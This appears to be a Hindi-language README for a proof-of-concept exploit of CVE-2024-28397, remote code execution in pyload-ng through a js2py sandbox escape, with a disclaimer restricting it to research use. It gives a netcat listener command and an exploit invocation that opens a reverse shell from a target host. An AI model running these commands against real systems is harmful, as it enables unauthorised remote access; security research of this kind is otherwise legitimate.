
CVE-2024-28397 के लिए PoC एक्सप्लॉइट – js2py सैंडबॉक्स एस्केप के माध्यम से pyload-ng में दूरस्थ कोड निष्पादन
इस रिपॉज़िटरी में CVE-2024-28397 के लिए एक प्रूफ-ऑफ-कॉन्सेप्ट (PoC) एक्सप्लॉइट है, जो pyload-ng को प्रभावित करने वाली एक रिमोट कोड एक्ज़ीक्यूशन भेद्यता है, जो js2py के असुरक्षित उपयोग के कारण होती है।
अस्वीकरण:
यह PoC केवल शैक्षिक और शोध उद्देश्यों के लिए है।
इसका उपयोग उन सिस्टमों पर न करें जिनके आप स्वामी नहीं हैं या जिनके परीक्षण की स्पष्ट अनुमति नहीं है।
लेखक इस कोड के किसी भी दुरुपयोग के लिए जिम्मेदार नहीं है।
pyload-ng में js2pyआपको Python 3.x, requests लाइब्रेरी, और रिवर्स शेल पकड़ने के लिए netcat की आवश्यकता होगी।
nc -lvnp 4444
python3 exploit.py -url http://target.com -lhost YOUR_IP -lport 4444 -user attacker -passwd attacker123